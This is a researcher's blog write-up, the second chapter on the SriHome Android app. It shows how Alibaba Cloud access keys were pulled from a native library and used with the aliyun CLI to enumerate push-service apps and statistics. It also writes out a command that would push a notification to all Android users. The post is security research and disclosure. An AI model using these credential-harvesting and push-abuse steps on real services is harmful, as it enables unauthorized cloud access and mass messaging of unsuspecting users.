deathflash ⚡️
Pwning SriHome: Chapter 2

Pwning SriHome: Chapter 2


Research
srihome mobile android cloud

Hold on a sec, did you check out the first chapter yet? If not, you might want to give it a read first. Head over there and catch up, then we’ll continue. Pwning SriHome: Chapter 1

Continuation

After successfully gaining access to their storage bucket and browsing through some files, I couldn’t shake the feeling that there might be more to uncover. So, I decided to backtrack to the initial point where I found the credentials - the libJNat.so file.

More Keys!

Since they were messing around with Alibaba’s cloud stuff, I thought, ‘Hey, there might be more sneaky credentials lying around.’ So, following GitGuardian’s lead with their fancy LT[A6]I pattern for access key IDs, I fired up a quick grep search. Lo and behold, I hit the jackpot - found another key along with it’s secret just hanging out there!

strings SriHome_21.9.24_Apkpure/lib/armeabi-v7a/libJNat.so | grep -A 1 'LT[A6]I'
LTAI...SSq
L01...BCd
--
LTA...CLu
J14...ESm

Note: Oh, and by the way, if you’re wondering why I used -A 1 in grep, it’s because it grabs one more line after the match, and that’s usually where the secret key hangs out - cause they come in pairs :P

Alright, let’s set up those second batch of credentials with aliyun-cli, but this time, let’s name the profile sricam to keep things organized.

aliyun configure --profile sricam
Configuring profile 'sricam' in 'AK' authenticate mode...
Access Key Id []: LTA......SSq
Access Key Secret []: L01......BCd
Default Region Id []: us-west-1
Default Output Format [json]: json (Only support json)
Default Language [zh|en] en:
Saving profile[sricam] ...Done.

Configure Done!!!
..............888888888888888888888 ........=8888888888888888888D=..............
...........88888888888888888888888 ..........D8888888888888888888888I...........
.........,8888888888888ZI: ...........................=Z88D8888888888D..........
.........+88888888 ..........................................88888888D..........
.........+88888888 .......Welcome to use Alibaba Cloud.......O8888888D..........
.........+88888888 ............. ************* ..............O8888888D..........
.........+88888888 .... Command Line Interface(Reloaded) ....O8888888D..........
.........+88888888...........................................88888888D..........
..........D888888888888DO+. ..........................?ND888888888888D..........
...........O8888888888888888888888...........D8888888888888888888888=...........
............ .:D8888888888888888888.........78888888888888888888O ..............

However, it seems that these credentials don’t grant access to any OSS buckets.

aliyun oss ls --profile sricam
ERROR: oss: service returned error: StatusCode=403, ErrorCode=AccessDenied, ErrorMessage="You are forbidden to list buckets.", RequestId=65D65B9DE2741F35326A81C4, Ec=0003-00000202

I gave both sets of credentials a spin across common services like ecs, rds, and cloudapi, but no luck. It seems they didn’t have access to any of those.

I hit a bit of a roadblock, so I decided to try something different. I started poking around by grepping for the strings ‘alibaba’ and ‘aliyun’ in the libJNat.so file. I found a match for “cloudpush.aliyuncs.com”.

strings SriHome_21.9.24_Apkpure/lib/armeabi-v7a/libJNat.so | grep alibaba

strings SriHome_21.9.24_Apkpure/lib/armeabi-v7a/libJNat.so | grep aliyun
cloudpush.aliyuncs.com

Then, while I was at it, I decided to grep for the word ‘push’ and stumbled upon ‘ali push’. A quick Google search later, and it turns out it’s a message push service.

strings SriHome_21.9.24_Apkpure/lib/armeabi-v7a/libJNat.so | grep push
...
ali push
cloudpush.aliyuncs.com
push success to:%s title:%s body:%s
...

I also went the extra mile and confirmed that the application was indeed using the push service by decompiling it with jadx. Here’s what I found:

Alright, now that we know it’s definitely utilizing the message push service, let’s brainstorm some ways to leverage it.

After digging through aliyun push --help, I stumbled upon ListSummaryApps, a command that lists all the applications using the push service.

aliyun push ListSummaryApps
{
	"RequestId": "22E9DE0F-7EF6-5E2A-BECC-D8156431D2A8",
	"SummaryAppInfos": {
		"SummaryAppInfo": [
			{
				"AppKey": 25539843,
				"AppName": "ifHome"
			},
			{
				"AppKey": 25548841,
				"AppName": "SriHomeNew"
			},
			{
				"AppKey": 24738117,
				"AppName": "SriHome"
			},
			{
				"AppKey": 24732061,
				"AppName": "ifHome"
			}
		]
	}
}

Sweet! With the AppKeys for all the applications in hand, let’s dive deeper and gather some statistics using QueryPushStatByApp.

aliyun push QueryPushStatByApp --AppKey 24738117 --StartTime 2024-01-01T00:00:00Z --EndTime 2024-02-01T00:00:00Z --Granularity DAY
{
	"AppPushStats": {
		"AppPushStat": [
			{
				"AcceptCount": 6331760,
				"DeletedCount": 0,
				"OpenedCount": 11851,
				"ReceivedCount": 5022263,
				"SentCount": 5023691,
				"Time": "2023-12-31T16:00:00Z"
			},
			{
				"AcceptCount": 6242835,
				"DeletedCount": 0,
				"OpenedCount": 10946,
				"ReceivedCount": 4937240,
				"SentCount": 4938704,
				"Time": "2024-01-01T16:00:00Z"
			},
			...
			...

Alright, querying data is cool, but let’s spice things up a bit. How about we take a peek at PushNoticeToAndroid? Now, that sounds interesting!

After a quick glance through the docs, it seems we’ll need:

  • AppKey - we got these!
  • Target - ALL, DEVICE, ACCOUNT, ALIAS, TAG (available options)
  • TargetValue -
Set according to Target. Use commas to separate multiple values. If the limit is exceeded, you need to push it multiple times.

Target=DEVICE, the value is as follows deviceid111,deviceid1111(up to 1000 supported).
Target=ACCOUNT, the value is as follows account111,account222(up to 1000 supported).
Target=ALIAS, the value is as follows alias111,alias222(supports up to 1000).
Target=TAG, supports single Tag and multiple Tags. For the format, please refer to Tag Format .
Target=ALL, the value is ALL .
  • Title
  • Body
aliyun push PushNoticeToAndroid --AppKey 25548841 --Target ALL --TargetValue ALL --Title deathflash --Body Pwned

Alright, so if I run the above it would shoot out a notification to all Android app users with the title “deathflash” and “Pwned” as the content… quite tempting, but let’s hold off on that, shall we?.

Conclusion

Despite being a basic service like mobile push, it’s alarming to realize how easily it could be exploited to harm application users.